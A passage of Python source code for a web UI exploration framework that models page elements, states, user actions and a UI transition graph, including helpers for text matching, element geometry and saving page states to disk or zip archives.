return m.group(1), m.group(2), m.group(3)
else:
return None
@staticmethod
def top_n(sample_values, n, reverse=False):
"""
get top N samples
"""
if not sample_values or n == 0:
return []
first_value = list(sample_values.values())[0]
sort_key = lambda x: x[1]
if isinstance(first_value, tuple) or isinstance(first_value, list):
sort_key = lambda x: x[1][0]
sample_value_pairs = sorted(sample_values.items(), key=sort_key, reverse=reverse)
result = []
for sample, value in sample_value_pairs:
if len(result) >= n:
return result
result.append(sample)
return result
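    # Illustrative sketch (not part of the original module):
    #
    #     # Utils.top_n({"a": 3, "b": 1, "c": 2}, n=2)               -> ["b", "c"]  (lowest values first)
    #     # Utils.top_n({"a": 3, "b": 1, "c": 2}, n=2, reverse=True) -> ["a", "c"]  (highest values first)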
@staticmethod
def is_number(text):
try:
num = float(text.replace(",", ""))
except:
return False
return True
@staticmethod
def is_date(text):
if text is None or Utils.is_number(text):
return False
for c in ["-", "/"]:
if c not in text:
continue
if text.startswith(c) or text.endswith(c):
continue
s = text.replace(c, "")
if len(s) > 8:
continue
if Utils.is_number(s):
return True
ss = s.lower().replace("y", "").replace("m", "").replace("d", "")
if len(ss) == 0:
return True
if len(Utils.parse_time_info(text)) > 0:
return True
return False
@staticmethod
def get_text_type(text):
if Utils.is_number(text):
return "number"
if Utils.is_date(text):
return "date"
return "text"
@staticmethod
def get_distance(x1, y1, x2, y2):
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5
@staticmethod
def nlp(text, **kwargs):
return Utils._get_instance()._nlp(text, **kwargs)
@staticmethod
def vec(text):
text_processed = Utils.nlp(text.lower(), disable=["tokenizer", "parser", "ner"])
return text_processed.vector
@staticmethod
def split_identifier(text):
matches = re.finditer('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)', text)
words = []
for m in matches:
words.extend(re.split('[-_]', m.group(0)))
return words
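    # Illustrative sketch (not part of the original module): identifiers are split
    # on camelCase boundaries as well as on "-" and "_".
    #
    #     # Utils.split_identifier("pickupLocation") -> ["pickup", "Location"]
    #     # Utils.split_identifier("drop_off-point") -> ["drop", "off", "point"]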
class Element:
def __init__(self, ele_dict, state):
self.ele_dict = ele_dict
self.state = state
self.id = ele_dict["WebBotID"]
self.tag_name = ele_dict["tagName"]
self.xpath = ele_dict["xpath"]
self.xpath_short = ele_dict["xpathShort"]
self.locator = ele_dict["locator"]
@lazy_property
def type(self):
if "type" in self.ele_dict:
return self.ele_dict["type"]
else:
return ""
@lazy_property
def in_window(self):
bound = self.ele_dict["bound"]
return bound["top"] < self.state.window_height and \
bound["bottom"] > 0 and \
bound["left"] < self.state.window_width and \
bound["right"] > 0
@lazy_property
def center(self):
bound = self.ele_dict["bound"]
center_x = (bound["left"] + bound["right"]) / 2
center_y = (bound["top"] + bound["bottom"]) / 2
return center_x, center_y
@lazy_property
def position(self):
bound = self.ele_dict["bound"]
return bound["left"], bound["top"]
@lazy_property
def bound_ltrb(self):
"""
return element bound coordinates, left, top, right, bottom
:return:
"""
bound = self.ele_dict["bound"]
return bound["left"], bound["top"], bound["right"], bound["bottom"]
@lazy_property
def font_size(self):
if "style" in self.ele_dict and "fontSize" in self.ele_dict["style"]:
return float(self.ele_dict["style"]["fontSize"])
return 0
@lazy_property
def font_weight(self):
if "style" in self.ele_dict and "fontWeight" in self.ele_dict["style"]:
return float(self.ele_dict["style"]["fontWeight"])
return 0
@lazy_property
def has_background_image(self):
if "style" in self.ele_dict and "hasBgImg" in self.ele_dict["style"]:
return self.ele_dict["style"]["hasBgImg"]
return False
@lazy_property
def has_border(self):
if "style" in self.ele_dict and "hasBorder" in self.ele_dict["style"]:
return self.ele_dict["style"]["hasBorder"]
return False
@lazy_property
def text_color_rgb(self):
if "style" in self.ele_dict and "color" in self.ele_dict["style"]:
return Utils.parse_rgb(self.ele_dict["style"]["color"])
return None
@lazy_property
def background_color_rgb(self):
if "style" in self.ele_dict and "bgColor" in self.ele_dict["style"]:
return Utils.parse_rgb(self.ele_dict["style"]["bgColor"])
return None
@lazy_property
def is_clickable(self):
if Action.CLICK in self.acceptable_action_types:
return True
if self.parent is None:
return False
return self.parent.is_clickable
@lazy_property
def dom_id(self):
self_id = self.ele_dict["domId"] if "domId" in self.ele_dict else None
if self_id:
return self_id
if self.parent is None:
return ""
return self.parent.dom_id
@lazy_property
def acceptable_action_types(self):
acceptable_action_types = []
action_set = self.ele_dict["actionSet"]
if action_set:
action_type = action_set["actionType"]
if action_type in ["click"]:
acceptable_action_types.append(Action.CLICK)
elif action_type in ["check"]:
acceptable_action_types.append(Action.CHECK)
elif action_type in ["select"]:
acceptable_action_types.append(Action.SELECT)
elif action_type in ["setValue"]:
acceptable_action_types.append(Action.INPUT_TEXT)
acceptable_action_types.append(Action.PRESS_ENTER)
return acceptable_action_types
@lazy_property
def get_webbot_xpath(self):
return "//*[@webbotid='%s']" % self.id
def get_acceptable_actions(self, task=None):
# Generate possible actions
acceptable_actions = []
action_set = self.ele_dict["actionSet"]
if action_set:
action_type = action_set["actionType"]
ele_type = self.ele_dict["type"] if "type" in self.ele_dict else None
if action_type == "click":
href = action_set["href"] if "href" in action_set else None
href_excluded = href and href.startswith("mailto:")
if ele_type != "reset" and not href_excluded:
action = Action(self, Action.CLICK, "")
acceptable_actions.append(action)
elif action_type == "setValue":
current_value = self.ele_dict["value"] if "value" in self.ele_dict else None
if task is not None:
if current_value in task.query_words:
action = Action(self, Action.PRESS_ENTER, "")
acceptable_actions.append(action)
for i, word in enumerate(task.query_words):
annotation = task.query_annotations[i]
if annotation:
action = Action(self, Action.INPUT_TEXT, word)
acceptable_actions.append(action)
# placeholder = self.ele_dict["placeholder"] if "placeholder" in self.ele_dict else None
# if placeholder or current_value:
# click_action = Action(self, Action.CLICK, "")
# acceptable_actions.append(click_action)
elif action_type == "check":
checked = action_set["checked"] if "checked" in action_set else False
if not checked:
action = Action(self, Action.CHECK, "")
acceptable_actions.append(action)
elif action_type == "select":
selected_indices = action_set["selectedIndices"] if "selectedIndices" in action_set else []
options = action_set["options"] if "options" in action_set else []
for i in range(len(options)):
# if i in selected_indices:
# continue
action = Action(self, Action.SELECT, i)
acceptable_actions.append(action)
else:
raise RuntimeError("Failed to recognize: " + action_type)
return acceptable_actions
def accepts_text(self, text):
if not text:
return False
if not Action.INPUT_TEXT in self.acceptable_action_types:
return False
ele_type = self.ele_dict["type"] if "type" in self.ele_dict else ""
if ele_type in ["", "text", "search", "password"]:
ele_value = self.ele_dict["value"] if "value" in self.ele_dict else ""
ele_placeholder = self.ele_dict["placeholder"] if "placeholder" in self.ele_dict else ""
if Utils.is_number(ele_value) or Utils.is_number(ele_placeholder):
return Utils.is_number(text)
return True
elif ele_type in ["button", "checkbox", "file", "hidden", "image", "radio", "reset", "submit", "range"]:
return False
elif ele_type in ["number", "range"]:
return Utils.is_number(text)
elif ele_type == "date":
if not re.match(r"\d{4}-\d{2}-\d{2}", text):
return False
elif ele_type == "month":
if not re.match(r"\d{4}-\d{2}", text):
return False
elif ele_type == "time":
if not re.match(r"\d{4}:\d{2}", text):
return False
elif ele_type == "week":
if not re.match(r"\d{4}-W\d{2}", text):
return False
elif ele_type == "datetime-local":
if not re.match(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}", text):
return False
elif ele_type == "email":
if not re.match(r"[^@]+@.+", text):
return False
return True
@lazy_property
def parent(self):
return self.state.get_parent(self)
@lazy_property
def parent_form(self):
if self.parent is None or self.parent.tag_name == "FORM":
return self.parent
return self.parent.parent_form
@lazy_property
def form_submit_action(self):
if self.tag_name != "FORM":
return None
for ele in self.all_child_elements:
if ele.type == "submit":
return Action(ele, Action.CLICK, "")
return None
@lazy_property
def all_child_elements(self):
all_child_elements = []
for ele in self.child_elements:
all_child_elements.append(ele)
all_child_elements.extend(ele.all_child_elements)
return all_child_elements
@lazy_property
def child_elements(self):
return self.state.get_child_elements(self)
@lazy_property
def own_text_list(self):
text_list = []
if "text" in self.ele_dict and self.ele_dict["text"]:
text_list.append(Utils.force_to_str(self.ele_dict["text"]).strip())
if "value" in self.ele_dict and self.ele_dict["value"]:
text_list.append(Utils.force_to_str(self.ele_dict["value"]).strip())
if "placeholder" in self.ele_dict and self.ele_dict["placeholder"]:
text_list.append(Utils.force_to_str(self.ele_dict["placeholder"]).strip())
if "title" in self.ele_dict and self.ele_dict["title"]:
text_list.append(Utils.force_to_str(self.ele_dict["title"]).strip())
if "labelValue" in self.ele_dict and self.ele_dict["labelValue"]:
text_list.append(Utils.force_to_str(self.ele_dict["labelValue"]).strip())
if "labelText" in self.ele_dict and self.ele_dict["labelText"]:
text_list.append(Utils.force_to_str(self.ele_dict["labelText"]).strip())
if "ariaLabel" in self.ele_dict and self.ele_dict["ariaLabel"]:
text_list.append(Utils.force_to_str(self.ele_dict["ariaLabel"]).strip())
# text_list.extend(Utils.split_identifier(self.dom_id))
return text_list
@lazy_property
def own_text_list_parsed(self):
text_list = []
for text in self.own_text_list:
text_list.append(Utils.parse(text))
return text_list
@lazy_property
def own_text(self):
return self.own_text_list[0] if len(self.own_text_list) > 0 else ""
@lazy_property
def own_text_parsed(self):
return self.own_text_list_parsed[0] if len(self.own_text_list_parsed) > 0 else ""
@lazy_property
def own_noninput_text(self):
input_text = ""
if Action.INPUT_TEXT in self.acceptable_action_types:
if "value" in self.ele_dict and self.ele_dict["value"]:
input_text = self.ele_dict["value"]
own_text_list = copy.copy(self.own_text_list)
if input_text in own_text_list:
own_text_list.remove(input_text)
return own_text_list[0] if len(own_text_list) > 0 else ""
@lazy_property
def own_noninput_text_parsed(self):
return Utils.parse(self.own_noninput_text)
@lazy_property
def inner_text_list(self):
text_list = list(self.own_text_list)
if self.tag_name != "SELECT":
# Ignore text in options, as the text of selected options is already in current element
for child_ele in self.child_elements:
text_list.extend(child_ele.inner_text_list)
return text_list
@lazy_property
def inner_text_list_parsed(self):
text_list = list(self.own_text_list_parsed)
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
text_list.extend(child_ele.inner_text_list_parsed)
return text_list
@lazy_property
def inner_text(self):
words = [self.own_text]
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
child_inner_text = child_ele.inner_text
if child_inner_text:
words.append(child_inner_text)
return " ".join(words)
@lazy_property
def inner_text_parsed(self):
words = [self.own_text_parsed]
if self.tag_name != "SELECT":
for child_ele in self.child_elements:
child_inner_text_words = child_ele.inner_text_parsed
if child_inner_text_words:
words.append(child_inner_text_words)
return " ".join(words)
def get_neighbour_element(self):
neighbour_element = None
shortest_dist = 100
for ele in self.state.unactionable_elements:
dist = self.get_shortest_distance(ele)
if dist < shortest_dist:
shortest_dist = dist
neighbour_element = ele
return neighbour_element
def max_match_score(self, text, is_input=False):
"""
compute the maximum matching score between current element and a given text
"""
scores = [0.0]
if is_input and Action.INPUT_TEXT in self.acceptable_action_types:
own_text_original = self.own_text.lower()
if self.own_text_parsed.startswith(text) or f"({text})" in own_text_original:
scores.append(1.0)
word_list = self.inner_text_list_parsed if len(self.inner_text_list_parsed) < 4 else self.own_text_list_parsed
if len(word_list) < 4:
for word_parsed in word_list:
score = Utils.text_similarity(text, word_parsed)
scores.append(score)
max_score = max(scores)
return max_score
def get_resized_bound(self, new_width, new_height):
window_w, window_h = self.state.window_width, self.state.window_height
resize_w, resize_h = float(new_width) / window_w, float(new_height) / window_h
bound = self.ele_dict["bound"]
return {
"top": int(max(0, bound["top"]) * resize_h),
"bottom": int(min(window_h, bound["bottom"]) * resize_h),
"left": int(max(0, bound["left"]) * resize_w),
"right": int(min(window_w, bound["right"]) * resize_w)
}
@lazy_property
def center(self):
bound = self.ele_dict["bound"]
center_x = float(bound["left"] + bound["right"]) / 2
center_y = float(bound["top"] + bound["bottom"]) / 2
return center_x, center_y
@lazy_property
def path_to_root(self):
path = [self]
parent_id = self.ele_dict["parent"]
if parent_id != -1:
parent_ele = self.state.id2elements[parent_id]
path.extend(parent_ele.path_to_root)
return path
@lazy_property
def cluster_id(self):
return re.sub(r"\d+", "?", self.xpath) + self.style_str
def get_tree_distance(self, ele):
path1 = self.path_to_root
path2 = ele.path_to_root
common_suffix_len = 0
for i in range(min(len(path1), len(path2))):
if path1[-i - 1].__str__() != path2[-i - 1].__str__():
break
common_suffix_len += 1
dist = len(path1) + len(path2) - 2 * common_suffix_len
return dist + 1
def get_center_distance(self, ele):
c1 = self.center
c2 = ele.center
dist = Utils.get_distance(c1[0], c1[1], c2[0], c2[1])
return dist
def get_shortest_distance(self, ele):
l1, t1, r1, b1 = self.bound_ltrb
l2, t2, r2, b2 = ele.bound_ltrb
left = r2 < l1
right = r1 < l2
bottom = b2 < t1
top = b1 < t2
if top and left:
return Utils.get_distance(l1, b1, r2, t2) * 2
elif left and bottom:
return Utils.get_distance(l1, t1, r2, b2) * 2
elif bottom and right:
return Utils.get_distance(r1, t1, l2, b2) * 2
elif right and top:
return Utils.get_distance(r1, b1, l2, t2) * 2
elif left:
return l1 - r2
elif right:
return l2 - r1
elif bottom:
return t1 - b2
elif top:
return t2 - b1
else: # rectangles intersect
return self.get_center_distance(ele)
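    # Illustrative sketch (not part of the original module): for disjoint boxes the
    # gap along the separating axis is returned (doubled between the nearest corners
    # when the boxes are diagonal to each other); overlapping boxes fall back to the
    # distance between their centres.
    #
    #     # A = (left=0, top=0, right=10, bottom=10)
    #     # B = (left=30, top=0, right=40, bottom=10)  -> distance 20 (purely to the right)
    #     # C = (left=20, top=30, right=30, bottom=40) -> 2 * distance between corners (10,10) and (20,30)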
@staticmethod
def cluster_elements(elements):
cluster_id_to_elements = {}
for ele in elements:
if ele.cluster_id not in cluster_id_to_elements:
cluster_id_to_elements[ele.cluster_id] = []
cluster_id_to_elements[ele.cluster_id].append(ele)
return cluster_id_to_elements
@lazy_property
def style_str(self):
return "FONT:size=%d;weight=%d;color=%s; BACKGROUND:img=%s;border=%s;color=%s;" % (
self.font_size,
self.font_weight,
",".join(self.text_color_rgb) if self.text_color_rgb else "null",
"Y" if self.has_background_image else "N",
"Y" if self.has_border else "N",
",".join(self.background_color_rgb) if self.background_color_rgb else "null",
)
def __str__(self):
return "[%s text=\"%s\"]" % (self.tag_name, self.inner_text)
class State:
def __init__(self, state_dict, screenshot=None):
self.state_dict = state_dict
self.screenshot = screenshot
self.url = state_dict["url"]
self.host = state_dict["host"]
self.window_width = state_dict["windowWidth"]
self.window_height = state_dict["windowHeight"]
self.possible_actions = []
self.task = None
self.finish_action = None
self.loaded_state_str = None
def __str__(self):
return self.url
def snapshot(self):
state_dict_copy = copy.deepcopy(self.state_dict)
return State(state_dict=state_dict_copy, screenshot=self.screenshot)
@lazy_property
def elements(self):
return [Element(state=self, ele_dict=ele_dict) for ele_dict in self.state_dict["elements"]]
@lazy_property
def elements_in_window(self):
elements_in_window = []
for ele in self.elements:
if ele.in_window:
elements_in_window.append(ele)
return elements_in_window
@lazy_property
def unclickable_elements(self):
elements = []
for ele in self.elements_in_window:
if not ele.is_clickable and len(ele.own_text) > 0:
elements.append(ele)
return elements
@lazy_property
def clickable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.is_clickable:
elements.append(ele)
return elements
@lazy_property
def unactionable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.acceptable_action_types:
continue
if not len(ele.own_text):
continue
if ele.is_clickable:
continue
elements.append(ele)
return elements
@lazy_property
def actionable_elements(self):
elements = []
for ele in self.elements_in_window:
if ele.acceptable_action_types:
elements.append(ele)
elif ele.tag_name == "OPTION":
elements.append(ele)
return elements
@lazy_property
def actionable_text_set(self):
text_set = set()
for ele in self.actionable_elements:
text = ele.own_text_parsed
# if Action.INPUT_TEXT in ele.acceptable_action_types:
# text = ele.own_noninput_text_parsed
if len(text) == 0 or len(text) > 30:
continue
text_set.add(text)
return text_set
@lazy_property
def content_elements(self):
# return elements that contain content
# leaf_elements = self.clickable_elements + self.unclickable_elements
leaf_elements = self.clickable_elements + self.unactionable_elements
content_elements = []
clusters = Element.cluster_elements(leaf_elements)
for cluster_id in clusters:
cluster_elements = clusters[cluster_id]
if cluster_elements[0].tag_name != "LABEL" and len(cluster_elements) > 4:
continue
content_elements.extend(cluster_elements)
return content_elements
@lazy_property
def id2elements(self):
return dict([(ele.id, ele) for ele in self.elements])
@lazy_property
def root_element(self):
return self.elements[0]
@lazy_property
def text(self):
return self.root_element.inner_text
@lazy_property
def text_in_window(self):
text = ""
for ele in self.elements_in_window:
text += " " + ele.own_text
return text
@lazy_property
def content_text(self):
text = ""
for ele in self.content_elements:
text += " " + ele.own_text
return text
@lazy_property
def image_hash(self):
import imagehash
return imagehash.dhash(self.screenshot, hash_size=10).__str__() if self.screenshot else "unknown_image_hash"
@lazy_property
def task_specific_hash(self):
assert self.task is not None
action_strs = []
for action in self.possible_actions:
action_strs.append(action.action_str)
for text_re in self.task.query_words + self.task.target_text_res:
action_strs.append("%s:%s" % (text_re, re.search(text_re, self.text_in_window, re.IGNORECASE) is None))
action_strs = "\n".join(action_strs)
m = Utils.md5(action_strs)
return m
@lazy_property
def task_independent_hash(self):
ele_strs = set()
for ele in self.actionable_elements:
if not ele:
continue
if len(ele.own_text) > 30:
continue
ele_action_types = ",".join(ele.acceptable_action_types)
ele_str = "%s %s %s %s" % (ele_action_types, ele.xpath, ele.own_text, ele.style_str)
ele_strs.add(ele_str)
all_ele_str = "\n".join(sorted(ele_strs))
m = Utils.md5(all_ele_str)
return m
@lazy_property
def action_set_hash(self):
action_strs = []
for action in self.possible_actions:
if not action.element:
continue
action_str = "%s %s %s" % (action.action_str, action.element, action.element.style_str)
action_strs.append(action_str)
action_strs = "\n".join(action_strs)
m = Utils.md5(action_strs)
return m
@lazy_property
def state_str(self):
# return self.task_specific_hash[:10] + self.image_hash[:6]
if self.loaded_state_str:
return self.loaded_state_str
return self.task_independent_hash
def same_form_elements(self, element):
ele_form = element.parent_form
elements = []
if ele_form:
submit_elements = []
for ele in ele_form.all_child_elements:
if ele.acceptable_action_types:
if ele.type == "submit":
submit_elements.append(ele)
else:
elements.append(ele)
elements.extend(submit_elements)
else:
for ele in self.actionable_elements:
if Action.INPUT_TEXT in ele.acceptable_action_types or \
Action.SELECT in ele.acceptable_action_types:
elements.append(ele)
return elements
def setup(self, task):
assert isinstance(task, Task)
# Setup the state
self.task = task
for ele in self.elements:
if not task.in_window_only or ele.in_window:
self.possible_actions.extend(ele.get_acceptable_actions(task))
self.finish_action = Action.finish()
# self.possible_actions.append(self.finish_action)
def same_as(self, state_):
return self.state_str == state_.state_str
@lazy_property
def possible_action_strs(self):
return set([action.action_str for action in self.possible_actions])
def is_page_changed(self, last_state):
# Whether this state is changed from last state
return not self.possible_action_strs.issubset(last_state.possible_action_strs)
def is_error_page(self):
# Whether current state is an error page
if len(self.possible_action_strs) == 0:
return True
error_messages = [
"not found",
"server error"
]
for error_msg in error_messages:
if re.search(error_msg, self.text_in_window, re.IGNORECASE):
return True
return False
def get_parent(self, element):
parent_id = element.ele_dict["parent"]
return self.id2elements[parent_id] if parent_id != -1 else None
def get_child_elements(self, element):
child_eles = []
for child_ele_id in element.ele_dict["children"]:
child_ele = self.id2elements[child_ele_id]
child_eles.append(child_ele)
return child_eles
def get_common_parent(self, elements):
paths_to_root = []
path_to_root = []
for element in elements:
path_to_root = [ele.id for ele in element.path_to_root]
paths_to_root.append(path_to_root)
for ele_id in path_to_root:
is_common_parent = True
for path in paths_to_root:
if ele_id not in path:
is_common_parent = False
break
if is_common_parent:
return self.id2elements[ele_id]
return None
def contains_words(self, words, document=None):
if document is None:
document = self.text_in_window
if not words:
return True
for word in words:
if word not in document:
return False
return True
def url_matches(self, url_res):
if not url_res:
return True
for url_re in url_res:
if not re.search(url_re, self.url):
return False
return True
def _get_action_match_ratio_matrix(self, query_words):
match_ratio_matrix = []
for query_word in query_words:
action_match_ratios = []
for action in self.possible_actions:
action_text = action.element.inner_text if action.action_type == Action.INPUT_TEXT else action.value
action_match_ratios.append(difflib.SequenceMatcher(None, query_word, action_text).ratio())
match_ratio_matrix.append(action_match_ratios)
return np.array(match_ratio_matrix)
def save(self, state_dir, replace=False, resize=None, file_name=None):
if not os.path.exists(state_dir):
os.makedirs(state_dir)
if file_name is None:
file_name = self.state_str
state_json_path = os.path.join(state_dir, file_name + ".json")
state_image_path = os.path.join(state_dir, file_name + ".png")
if replace or (not os.path.exists(state_image_path)):
if self.screenshot:
screen = self.screenshot.resize(resize, Image.ANTIALIAS) if resize else self.screenshot
screen.save(state_image_path)
if replace or (not os.path.exists(state_json_path)):
json.dump(self.state_dict, open(state_json_path, "w"), indent=1)
def save_to_zip(self, zip_path, replace=False):
if not zip_path:
return False
try:
zip_file = ZipFile(zip_path, mode="a", compression=COMPRESS_METHOD)
state_json_path = "states/" + self.state_str + ".json"
state_image_path = "states/" + self.state_str + ".png"
json_exists = True if state_json_path in zip_file.namelist() else False
image_exists = True if state_image_path in zip_file.namelist() else False
if replace or (not json_exists):
state_json_str = json.dumps(self.state_dict, indent=1)
zip_file.writestr(state_json_path, state_json_str)
if replace or (not image_exists):
screen = self.screenshot.resize([240, 240], Image.ANTIALIAS)
image_file = BytesIO()
screen.save(image_file, "PNG")
                # zip_file is open in append mode; write the PNG bytes into the archive
zip_file.writestr(state_image_path, image_file.getvalue())
zip_file.close()
return zip_file
except:
traceback.print_exc()
return None
@staticmethod
def load(state_dir, state_str):
if state_dir and state_str:
if state_dir.endswith(".zip"):
return State.load_from_zip(zip_path=state_dir, state_str=state_str)
state_json_path = os.path.join(state_dir, state_str + ".json")
state_image_path = os.path.join(state_dir, state_str + ".png")
state_dict = json.load(open(state_json_path))
state_image = Image.open(state_image_path)
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
return state
return None
@staticmethod
def load_from_zip(zip_path, state_str):
try:
zip_file = ZipFile(zip_path, mode="r")
state_json_path = "states/" + state_str + ".json"
state_image_path = "states/" + state_str + ".png"
state_dict = json.load(zip_file.open(state_json_path))
state_image = Image.open(zip_file.open(state_image_path))
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
zip_file.close()
return state
except:
# traceback.print_exc()
pass
try:
zip_file = ZipFile(zip_path, mode="r")
state_json_path = state_str + ".json"
state_image_path = state_str + ".png"
state_dict = json.load(zip_file.open(state_json_path))
state_image = Image.open(zip_file.open(state_image_path))
state = State(state_dict=state_dict, screenshot=state_image)
state.loaded_state_str = state_str
zip_file.close()
return state
except:
# traceback.print_exc()
return None
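    # Illustrative sketch of the archive layout assumed by save_to_zip/load_from_zip
    # (not part of the original module): states live under a "states/" prefix, with
    # a legacy fallback to the archive root; the file name below is hypothetical.
    #
    #     # example_utg.zip
    #     #   states/<state_str>.json   - the serialised state_dict
    #     #   states/<state_str>.png    - 240x240 screenshot thumbnail
    #     #   utg.js                    - written separately by UTG.save_to_zip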
def get_action(self, action_str):
for action in self.possible_actions:
if action.action_str == action_str:
return action
m = re.match(ACTION_RE, action_str)
if m:
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
action_element = self.get_element_by_locator(target_locator)
if action_element:
return Action(element=action_element, action_type=action_type, value=value)
return None
def get_element_by_locator(self, locator):
locator_xpaths = locator.split(" || ")
matched_ele = None
max_match_count = 0
for ele in self.elements:
ele_xpaths = ele.locator.split(" || ")
ele_match_count = sum([(1 if locator_xpath in ele_xpaths else 0) for locator_xpath in locator_xpaths])
if ele_match_count > max_match_count:
max_match_count = ele_match_count
matched_ele = ele
return matched_ele
def included_actions(self, actions):
included_actions = []
for action in actions:
if not action.element:
continue
action_element = self.get_element_by_locator(action.element.xpath)
if action_element:
included_actions.append(action)
return included_actions
def interacted_elements(self, actions):
elements_in_this_state = []
elements_not_in_this_state = []
for action in actions:
if not action.element:
continue
action_element = self.get_element_by_locator(action.element.xpath)
if action_element:
if action_element not in elements_in_this_state:
elements_in_this_state.append(action_element)
else:
if action.element not in elements_not_in_this_state:
elements_not_in_this_state.append(action.element)
return elements_in_this_state, elements_not_in_this_state
class Action:
RESET = "reset"
FINISH = "finish"
CLICK = "click"
CHECK = "check"
SELECT = "select"
INPUT_TEXT = "input_text"
PRESS_ENTER = "press_enter"
def __init__(self, element, action_type, value):
self.element = element
self.action_type = action_type
self.value = value
def to_dict(self):
return {
"action_type": self.action_type,
"target": self.element.id,
"value": self.value
}
@staticmethod
def finish():
return Action(None, Action.FINISH, "")
@lazy_property
def value_text(self):
if not self.element:
return ""
if self.action_type == Action.SELECT:
selected_index = int(self.value)
if "actionSet" in self.element.ele_dict \
and "options" in self.element.ele_dict["actionSet"] \
and len(self.element.ele_dict["actionSet"]["options"]) > selected_index:
return Utils.force_to_str(self.element.ele_dict["actionSet"]["options"][selected_index])
else:
return "ERROR"
elif self.action_type == Action.INPUT_TEXT:
return self.value
elif self.action_type == Action.CLICK:
return self.element.inner_text
elif self.action_type == Action.CHECK:
return self.element.inner_text
else:
return self.value
@lazy_property
def value_text_parsed(self):
return Utils.parse(self.value_text)
@lazy_property
def surrounding_words(self):
words = []
# words.append(self.action_type)
if self.element is not None:
words.extend(self.element.inner_text_list)
# neighbour_ele = self.element.get_neighbour_element()
# if neighbour_ele:
# words.extend(neighbour_ele.own_text_list)
if self.value_text in words:
words.remove(self.value_text)
return words
@lazy_property
def surrounding_words_parsed(self):
words = []
for word in self.surrounding_words:
words.append(Utils.parse(word))
return words
@lazy_property
def action_str(self):
ele_xpath = self.element.xpath_short if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_xpath)
@lazy_property
def norm_action_str(self):
if self.action_type in [Action.INPUT_TEXT, Action.SELECT]:
return re.sub(r"#.*#", "#?#", self.action_str)
else:
return re.sub(r"\d+", "?", self.action_str)
@lazy_property
def is_submit(self):
if self.action_type == Action.CLICK and self.element and self.element.type == "submit":
return True
if self.action_type == Action.PRESS_ENTER:
return True
return False
@lazy_property
def is_input(self):
return self.action_type in [Action.INPUT_TEXT, Action.SELECT]
@staticmethod
def cluster_actions(actions):
cluster_id_to_actions = {}
for action in actions:
if action.norm_action_str not in cluster_id_to_actions:
cluster_id_to_actions[action.norm_action_str] = []
cluster_id_to_actions[action.norm_action_str].append(action)
return cluster_id_to_actions
@lazy_property
def replay_api(self):
ele_locator = self.element.locator if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_locator)
@lazy_property
def unique_id(self):
ele_xpath = self.element.xpath if self.element else ""
return "%s #%s# @ %s" % (self.action_type, self.value, ele_xpath)
def match_score(self, action):
score = Utils.text_similarity(self.value_text_parsed, action.value_text_parsed)
if self.action_type != action.action_type:
score *= 0.8
return score
def __str__(self):
return "%s %s @ %s" % (self.action_type, self.value_text, self.element)
class UTG:
"""
UI transition graph for web pages
"""
def __init__(self, start_url="", states_dir=None, save_states=False, name="", **kwargs):
self.logger = logging.getLogger(self.__class__.__name__)
self.start_url = start_url
self.states_dir = states_dir
self.save_states = save_states
self.zip_path = None
self.utg_dir = None
self.name = name
self.G = nx.DiGraph()
self.ineffective_action_strs = set()
self.action_next_state_count = {}
self.action_count = 0
self.start_time = datetime.now()
def _context_action_str(self, action, state):
return state.state_str[:4] + ": " + action.action_str
def add_transition(self, action, old_state, new_state):
self.add_state(old_state)
self.add_state(new_state)
# make sure the states are not None
if not old_state or not new_state:
return
action_str = self._context_action_str(action, old_state)
self.action_count += 1
self.add_action_target_state(action_str, new_state.state_str)
self.G.nodes[old_state.state_str]["tried_action_strs"].append(action_str)
if old_state.state_str == new_state.state_str:
self.ineffective_action_strs.add(action_str)
else:
if (old_state.state_str, new_state.state_str) not in self.G.edges():
self.G.add_edge(old_state.state_str, new_state.state_str, actions={})
self.G[old_state.state_str][new_state.state_str]["actions"][action_str] = self.action_count
def add_state(self, state):
if state and (state.state_str not in self.G.nodes()):
self.G.add_node(state.state_str,
url=state.url,
action_strs=[self._context_action_str(action, state) for action in state.possible_actions],
tried_action_strs=[])
if self.save_states and self.utg_dir:
states_dir = os.path.join(self.utg_dir, "states")
state.save(states_dir)
if self.save_states and self.zip_path:
state.save_to_zip(self.zip_path)
def get_state(self, state_str):
if self.utg_dir:
states_dir = os.path.join(self.utg_dir, "states")
return State.load(states_dir, state_str)
if self.zip_path:
return State.load_from_zip(self.zip_path, state_str)
def add_init_state(self, state):
self.add_state(state)
self.add_action_target_state(Action.RESET, state.state_str)
def get_init_state_str(self):
next_state_weights = self.get_next_state_weights()
useless_state_strs = set()
for state_str in next_state_weights:
if not self.G[state_str]:
useless_state_strs.add(state_str)
for state_str in useless_state_strs:
next_state_weights.pop(state_str)
return Utils.weighted_choice(next_state_weights)
def get_next_state_weights(self, action=None, state=None):
"""
The next states with weights
:param action:
:return:
"""
action_str = self._context_action_str(action, state) if action else Action.RESET
return self.action_next_state_count[action_str] if action_str in self.action_next_state_count else None
def is_ineffective(self, action, state):
action_str = self._context_action_str(action, state) if action else Action.RESET
return action_str in self.ineffective_action_strs
def add_action_target_state(self, action_str, state_str):
if action_str not in self.action_next_state_count:
self.action_next_state_count[action_str] = {}
if state_str in self.action_next_state_count[action_str]:
self.action_next_state_count[action_str][state_str] += 1
else:
self.action_next_state_count[action_str][state_str] = 1
def get_utg_dict(self):
utg_nodes = []
utg_edges = []
for state_str in self.G.nodes():
action_strs = self.G.nodes[state_str]["action_strs"]
tried_action_strs = self.G.nodes[state_str]["tried_action_strs"]
state_url = self.G.nodes[state_str]["url"]
state_desc = UTG.list_to_html_table([
("url", state_url),
("state_str", state_str)
])
utg_node = {
"id": state_str,
"label": state_url,
"state_str": state_str,
"action_strs": action_strs,
"tried_action_strs": tried_action_strs,
"ineffective_action_strs": list(self.ineffective_action_strs.intersection(action_strs)),
"title": state_desc,
"shape": "image",
"image": "states/" + state_str + ".png"
}
if state_str in self.action_next_state_count[Action.RESET]:
